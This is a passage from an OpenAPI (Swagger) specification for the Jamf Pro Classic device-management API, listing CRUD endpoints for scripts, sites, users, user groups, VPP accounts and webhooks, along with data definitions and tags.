'200':
description: No response was specified
tags:
- restrictedsoftware
operationId: updateRestrictedSoftwareById
summary: Updates an existing restricted software by id
'/restrictedsoftware/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- restrictedsoftware
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findRestrictedSoftwareByName
summary: Finds restricted software by name
/savedsearches:
get:
responses:
'200':
description: No response was specified
tags:
- savedsearches
operationId: findSavedSearches
summary: Finds all saved searches (deprecated). advancedcomputersearches and advancedmobiledevicesearches should be used instead of savedsearches.
'/savedsearches/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- savedsearches
operationId: findSavedSearchesById
summary: Finds saved searches by id
'/savedsearches/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- savedsearches
operationId: findSavedSearchesByName
summary: Finds saved searches by name
/scripts:
get:
responses:
'200':
description: No response was specified
tags:
- scripts
operationId: findScripts
summary: Finds all scripts
'/scripts/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- scripts
operationId: deleteScriptById
summary: Deletes a script by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- scripts
description: 'script_contents_encoded is the equivalent of script_contents, but it has been Base 64 encoded.'
operationId: findScriptsById
summary: Finds scripts by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- scripts
description: Generally only one of script_contents_encoded and script_contents should be submitted.
operationId: createScriptById
summary: Creates a new script by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- scripts
description: Generally only one of script_contents_encoded and script_contents should be submitted.
operationId: updateScriptById
summary: Updates an existing script by id
'/scripts/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- scripts
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findScriptsByName
summary: Finds scripts by name
/sites:
get:
responses:
'200':
description: No response was specified
tags:
- sites
operationId: findSites
summary: Finds all sites
'/sites/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- sites
operationId: deleteSiteById
summary: Deletes a site by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- sites
operationId: findSitesById
summary: Finds sites by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- sites
operationId: createSiteById
summary: Creates a new site by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- sites
operationId: updateSiteById
summary: Updates an existing site by id
'/sites/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- sites
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findSitesByName
summary: Finds sites by name
/smtpserver:
get:
responses:
'200':
description: No response was specified
tags:
- smtpserver
operationId: findSMTPServer
summary: Finds the Jamf Pro smtp server information
put:
responses:
'200':
description: No response was specified
tags:
- smtpserver
description: Password can be changed via the <password> element. Password should be clear text and sent over SSL.
operationId: updateSMTPServer
summary: Updates the Jamf Pro smtp server information
/softwareupdateservers:
get:
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
operationId: findSoftwareUpdateServers
summary: Finds all software update servers
'/softwareupdateservers/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
operationId: deleteSoftwareUpdateServerById
summary: Deletes a software update server by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
operationId: findSoftwareUpdateServersById
summary: Finds software update servers by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
operationId: createSoftwareUpdateServerById
summary: Creates a new software update server by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
operationId: updateSoftwareUpdateServerById
summary: Updates an existing software update server by id
'/softwareupdateservers/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- softwareupdateservers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findSoftwareUpdateServersByName
summary: Finds software update servers by name
/userextensionattributes:
get:
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
operationId: findUserextensionattributes
summary: Finds all user extension attributes
'/userextensionattributes/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
operationId: deleteUserextensionattributeById
summary: Deletes a user extension attribute by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
operationId: findUserextensionattributesById
summary: Finds user extension attributes by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
operationId: createUserextensionattributeById
summary: Creates a new user extension attribute by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
operationId: updateUserextensionattributeById
summary: Updates an existing user extension attribute by id
'/userextensionattributes/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- userextensionattributes
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findUserextensionattributesByName
summary: Finds user extension attributes by name
/usergroups:
get:
responses:
'200':
description: No response was specified
tags:
- usergroups
operationId: findUserGroups
summary: Finds all user groups
'/usergroups/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- usergroups
operationId: deleteUserGroupsById
summary: Deletes user groups by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- usergroups
operationId: findUserGroupsById
summary: Finds user groups by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- usergroups
operationId: createUserGroupsById
summary: Creates user groups by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- usergroups
description: PUT also works with a name. One or more users can be added by using <user_additions> instead of <users>. One or more users can be deleted by using <user_deletions> instead of <users>
operationId: updateUserGroupsById
summary: Updates user groups by id
'/usergroups/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- usergroups
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findUserGroupsByName
summary: Finds user groups by name
/users:
get:
responses:
'200':
description: No response was specified
tags:
- users
operationId: findUsers
summary: Finds all users
'/users/email/{email}':
get:
parameters:
- description: Email address to filter by
in: path
name: email
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- users
description: 'Because email addresses may not be unique, this operation returns a list of users. You cannot PUT, POST, and DELETE using this resource URL.'
operationId: findUsersByEmailAddress
summary: Finds users by email address
'/users/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- users
operationId: deleteUserById
summary: Deletes a user by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- users
operationId: findUsersById
summary: Finds users by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- users
description: 'POST cannot be used to add computers, mobile devices, peripherals, vpp assignments to a user.'
operationId: createUserById
summary: Creates a new user by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- users
description: 'PUT cannot be used to add computers, mobile devices, peripherals, vpp assignments to a user.'
operationId: updateUserById
summary: Updates an existing user by id
'/users/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- users
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findUsersByName
summary: Finds users by name
/vppaccounts:
get:
responses:
'200':
description: No response was specified
tags:
- vppaccounts
operationId: findVPPAdminAccount
summary: Finds all VPP Accounts
'/vppaccounts/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppaccounts
operationId: deleteAccountById
summary: Deletes a vpp account by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppaccounts
operationId: findAccountById
summary: Finds VPP Account by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppaccounts
description: service_token and name are required. account_name and expiration_date are set from the service token
operationId: createAccountById
summary: Creates a new vpp account by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppaccounts
description: service_token may not match another vpp account. account_name and expiration_date are set from the service token
operationId: updateAccountById
summary: Updates a vpp account by id
/vppassignments:
get:
responses:
'200':
description: No response was specified
tags:
- vppassignments
operationId: findVPPAdminAssignment
summary: Finds all VPP Assignments
'/vppassignments/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppassignments
operationId: deleteAssignmentById
summary: Deletes a vpp assignment by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppassignments
operationId: findAssignmentById
summary: Finds VPP Assignment by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppassignments
description: Name is required.
operationId: createAssignmentById
summary: Creates a new vpp assignment by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppassignments
description: Name is required.
operationId: updateAssignmentById
summary: Updates a vpp assignment by id
/vppinvitations:
get:
responses:
'200':
description: No response was specified
tags:
- vppinvitations
operationId: findVPPAdminInvitation
summary: Finds all VPP Invitations
'/vppinvitations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppinvitations
operationId: deleteInvitationById
summary: Deletes a vpp invitation by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppinvitations
operationId: findInvitationById
summary: Finds VPP Invitation by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppinvitations
description: 'Name, account, distribution_method required. Email fields required if ''Send Emails'' distribution method specified. Usages are ignored in POST.'
operationId: createInvitationById
summary: Creates a new vpp invitation by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- vppinvitations
description: 'Name, account, distribution_method required. Email fields required if ''Send Emails'' distribution method specified. Usages are ignored in a PUT.'
operationId: updateInvitationById
summary: Updates a vpp invitation by id
'/vppinvitations/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- vppinvitations
description: 'Displays information specified with the {subset} parameter for a VPP invitation specified with the {id} parameter. For example, /vppinvitations/id/3/subset/General&Scope&Usages or /vppinvitations/id/3/subset/Usages.'
operationId: findInvitationsByIdSubset
summary: Display subsets of information for a VPP invitation
/webhooks:
get:
responses:
'200':
description: No response was specified
tags:
- webhooks
operationId: findWebhooks
summary: Finds all webhooks
'/webhooks/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- webhooks
operationId: deleteWebhookById
summary: Deletes a webhook by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- webhooks
operationId: findWebhooksById
summary: Finds webhooks by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- webhooks
operationId: createWebhookById
summary: Creates a new webhook by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- webhooks
operationId: updateWebhookById
summary: Updates an existing webhook by id
'/webhooks/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- webhooks
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findWebhooksByName
summary: Finds webhooks by name
definitions:
'':
properties:
id:
format: int64
type: integer
name:
type: string
Account:
properties:
id:
format: int64
type: integer
name:
type: string
ActivationCode: {}
AdvancedComputerSearch:
properties:
id:
format: int64
type: integer
name:
type: string
AdvancedMobileDeviceSearch:
properties:
id:
format: int64
type: integer
name:
type: string
AdvancedUserSearch:
properties:
id:
format: int64
type: integer
name:
type: string
AllowedFileExtension:
properties:
extension:
type: string
id:
format: int64
type: integer
BYOProfile:
properties:
id:
format: int64
type: integer
name:
type: string
Building:
properties:
id:
format: int64
type: integer
name:
type: string
Category:
properties:
id:
format: int64
type: integer
name:
type: string
Class:
properties:
id:
format: int64
type: integer
name:
type: string
Computer:
properties:
id:
format: int64
type: integer
macaddress:
type: string
match:
type: string
name:
type: string
serialnumber:
type: string
subset:
type: string
udid:
type: string
ComputerApplicationUsage:
properties:
end_date:
type: string
id:
format: int64
type: integer
macaddress:
type: string
name:
type: string
serialnumber:
type: string
start_date:
type: string
udid:
type: string
ComputerApplications:
properties:
application:
type: string
inventory:
type: string
version:
type: string
ComputerCheckin: {}
ComputerCommand:
properties:
command:
type: string
id:
format: int64
type: integer
name:
type: string
uuid:
type: string
ComputerConfiguration:
properties:
id:
format: int64
type: integer
name:
type: string
ComputerGroup:
properties:
id:
format: int64
type: integer
name:
type: string
ComputerHardwareSoftwareReports:
properties:
end_date:
type: string
id:
format: int64
type: integer
macaddress:
type: string
name:
type: string
serialnumber:
type: string
start_date:
type: string
udid:
type: string
ComputerHistory:
properties:
id:
format: int64
type: integer
name:
type: string
subset:
type: string
ComputerInventoryCollection: {}
ComputerInvitation:
properties:
id:
format: int64
type: integer
invitation:
type: string
name:
type: string
ComputerManagement:
properties:
id:
format: int64
type: integer
name:
type: string
subset:
type: string
username:
type: string
Computerextensionattribute:
properties:
id:
format: int64
type: integer
name:
type: string
Department:
properties:
id:
format: int64
type: integer
name:
type: string
DirectoryBinding:
properties:
id:
format: int64
type: integer
name:
type: string
Disk Encryption Configuration:
properties:
id:
format: int64
type: integer
name:
type: string
DistributionPoint:
properties:
id:
format: int64
type: integer
name:
type: string
DockItem:
properties:
id:
format: int64
type: integer
name:
type: string
EBook:
properties:
id:
format: int64
type: integer
name:
type: string
FileUploads: {}
GSXConnection: {}
HealthcareListener:
properties:
hclid:
format: int64
type: integer
HealthcareListenerRule:
properties:
id:
format: int64
type: integer
IBeacon:
properties:
id:
format: int64
type: integer
major:
format: int64
type: integer
minor:
format: int64
type: integer
name:
type: string
udid:
type: string
InfrastructureManager:
properties:
hclid:
format: int64
type: integer
JSON Web Token Configuration:
properties:
disabled:
type: boolean
encryption_key:
type: string
id:
format: int64
type: integer
name:
type: string
token_expiry:
format: int32
type: integer
JSSUser: {}
LDAP Server:
properties:
id:
format: int64
type: integer
name:
type: string
LicensedSoftware:
properties:
id:
format: int64
type: integer
name:
type: string
Macapp:
properties:
id:
format: int64
type: integer
name:
type: string
subset:
type: string
ManagedPreferenceProfiles:
properties:
id:
format: int64
type: integer
name:
type: string
MobileDevice:
properties:
id:
format: int64
type: integer
match:
type: string
name:
type: string
subset:
type: string
MobileDeviceApplication:
properties:
bundleid:
type: string
id:
format: int64
type: integer
name:
type: string
subset:
type: string
version:
type: string
MobileDeviceCommand:
properties:
command:
type: string
id:
format: int64
type: integer
name:
type: string
uuid:
type: string
MobileDeviceConfigurationProfile:
properties:
id:
format: int64
type: integer
name:
type: string
MobileDeviceEnrollmentProfile:
properties:
id:
format: int64
type: integer
name:
type: string
MobileDeviceGroup:
properties:
id:
format: int64
type: integer
name:
type: string
MobileDeviceHistory:
properties:
id:
format: int64
type: integer
name:
type: string
subset:
type: string
MobileDeviceInvitation:
properties:
id:
format: int64
type: integer
invitation:
type: string
MobileDeviceProvisioningProfile:
properties:
id:
format: int64
type: integer
name:
type: string
Mobiledeviceextensionattribute:
properties:
id:
format: int64
type: integer
name:
type: string
NetbootServer:
properties:
id:
format: int64
type: integer
name:
type: string
NetworkSegment:
properties:
id:
format: int64
type: integer
name:
type: string
OsxConfigurationProfile:
properties:
id:
format: int64
type: integer
name:
type: string
Package:
properties:
id:
format: int64
type: integer
name:
type: string
Patch:
properties:
id:
format: int64
type: integer
name:
type: string
version:
type: string
Patch Available Titles:
properties:
id:
format: int64
type: integer
Patch External Source:
properties:
id:
format: int64
type: integer
name:
type: string
Patch Internal Source:
properties:
id:
format: int64
type: integer
name:
type: string
Patch Policy:
properties:
id:
format: int64
type: integer
name:
type: string
Peripheral:
properties:
id:
format: int64
type: integer
name:
type: string
Peripheral Types:
properties:
id:
format: int64
type: integer
name:
type: string
Policy:
properties:
id:
format: int64
type: integer
name:
type: string
subset:
type: string
Printer:
properties:
id:
format: int64
type: integer
name:
type: string
RemovableMacAddress:
properties:
id:
format: int64
type: integer
name:
type: string
RestrictedSoftware:
properties:
id:
format: int64
type: integer
name:
type: string
SMTPServer: {}
SavedSearch:
properties:
id:
format: int64
type: integer
name:
type: string
Script:
properties:
id:
format: int64
type: integer
name:
type: string
Site:
properties:
id:
format: int64
type: integer
name:
type: string
SoftwareUpdateServer:
properties:
id:
format: int64
type: integer
name:
type: string
User:
properties:
email:
type: string
id:
format: int64
type: integer
name:
type: string
UserGroup:
properties:
id:
format: int64
type: integer
name:
type: string
Userextensionattribute:
properties:
id:
format: int64
type: integer
name:
type: string
VPPAdminAccount: {}
VPPAssignment:
properties:
id:
format: int64
type: integer
VPPInvitation:
properties:
id:
format: int64
type: integer
subset:
type: string
Webhook:
properties:
id:
format: int64
type: integer
name:
type: string
commandflush:
properties:
id:
type: string
idtype:
type: string
status:
type: string
logflush:
properties:
id:
format: int64
type: integer
interval:
type: string
log:
type: string
securityDefinitions:
basicAuth:
type: basic
tags:
- description: Operations on Jamf Pro accounts
name: accounts
- description: Operations on activationcode
name: activationcode
- description: Operations on advanced computer searches
name: advancedcomputersearches
- description: Operations on advanced mobile device searches
name: advancedmobiledevicesearches
- description: Operations on advanced user searches
name: advancedusersearches
- description: Operations on allowed file extensions
name: allowedfileextensions
- description: Operations on buildings
name: buildings
- description: Operations on byoprofiles
name: byoprofiles
- description: Operations on categories
name: categories
- description: Operations on classes
name: classes
- description: Operations on commandflush
name: commandflush
- description: Operations on computer applications
name: computerapplications
- description: Operations on computerapplicationusage
name: computerapplicationusage
- description: Operations on computercheckin
name: computercheckin
- description: Operations on computercommands
name: computercommands
- description: Operations on computerconfigurations
name: computerconfigurations
- description: Operations on computerextensionattributes
name: computerextensionattributes
- description: Operations on computergroups
name: computergroups
- description: Operations on computerhardwaresoftwarereports
name: computerhardwaresoftwarereports
- description: Operations on computerhistory
name: computerhistory
- description: Operations on computerinventorycollection
name: computerinventorycollection
- description: Operations on computerinvitations
name: computerinvitations
- description: Operations on computermanagement
name: computermanagement
- description: Operations on computerreports
name: computerreports
- description: Operations on computers
name: computers
- description: Operations on departments
name: departments
- description: Operations on directory bindings
name: directorybindings
- description: Operations on disk encryption configurations
name: diskencryptionconfigurations
- description: Operations on distributionpoints
name: distributionpoints
- description: Operations on dockitems
name: dockitems
- description: Operations on ebooks
name: ebooks
- description: Operations on fileuploads
name: fileuploads
- description: Operations on gsxconnection
name: gsxconnection
- description: Operations on Healthcare Listener
name: healthcarelistener
- description: Operations on Healthcare Listener rules
name: healthcarelistenerrule
- description: Operations on iBeacon regions
name: ibeacons
- description: Operations on infrastructure manager
name: infrastructuremanager
- description: Operations on JSON Web Tokens
name: jsonwebtokenconfigurations
- description: Operations on accounts (Deprecated)
name: jssuser
- description: Operations on ldapservers
name: ldapservers
- description: Operations on licensedsoftware
name: licensedsoftware
- description: Operations on logflush
name: logflush
- description: Operations on macapplications
name: macapplications
- description: Operations on managedpreferenceprofiles
name: managedpreferenceprofiles
- description: Operations on mobiledeviceapplications
name: mobiledeviceapplications
- description: Operations on mobiledevicecommands
name: mobiledevicecommands
- description: Operations on mobiledeviceconfigurationprofiles
name: mobiledeviceconfigurationprofiles
- description: Operations on mobiledeviceenrollmentprofiles
name: mobiledeviceenrollmentprofiles
- description: Operations on mobiledeviceextensionattributes
name: mobiledeviceextensionattributes
- description: Operations on mobiledevicegroups
name: mobiledevicegroups
- description: Operations on mobiledevicehistory
name: mobiledevicehistory
- description: Operations on mobiledeviceinvitations
name: mobiledeviceinvitations
- description: Operations on mobiledeviceprovisioningprofiles
name: mobiledeviceprovisioningprofiles
- description: Operations on mobiledevices
name: mobiledevices
- description: Operations on netbootservers
name: netbootservers
- description: Operations on networksegments
name: networksegments
- description: Operations on osxconfigurationprofiles
name: osxconfigurationprofiles
- description: Operations on packages
name: packages
- description: Operations on available patch titles from a source
name: patchavailabletitles
- description: Operations on patches
name: patches
- description: Operations on patch external sources
name: patchexternalsources
- description: Operations on patch internal sources
name: patchinternalsources
- description: Operations on patch policies
name: patchpolicies
- description: Operations on patch reports
name: patchreports
- description: Operations on patch software titles
name: patchsoftwaretitles
- description: Operations on peripherals
name: peripherals
- description: Operations on peripheraltypes
name: peripheraltypes
- description: Operations on policies
name: policies
- description: Operations on printers
name: printers
- description: Operations on removablemmacaddresses
name: removablemacaddresses
- description: Operations on restrictedsoftware
name: restrictedsoftware
- description: Operations on savedsearches (deprecated)
name: savedsearches
- description: Operations on scripts
name: scripts
- description: Operations on sites
name: sites
- description: Operations on smtpserver
name: smtpserver
- description: Operations on softwareupdateservers
name: softwareupdateservers
- description: Operations on userextensionattributes
name: userextensionattributes
- description: Operations on usergroups
name: usergroups
- description: Operations on users
name: users
- description: Operations on vppaccounts
name: vppaccounts
- description: Operations on vppassignments
name: vppassignments
- description: Operations on vppinvitations
name: vppinvitations
- description: Operations on webhooks
name: webhooks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment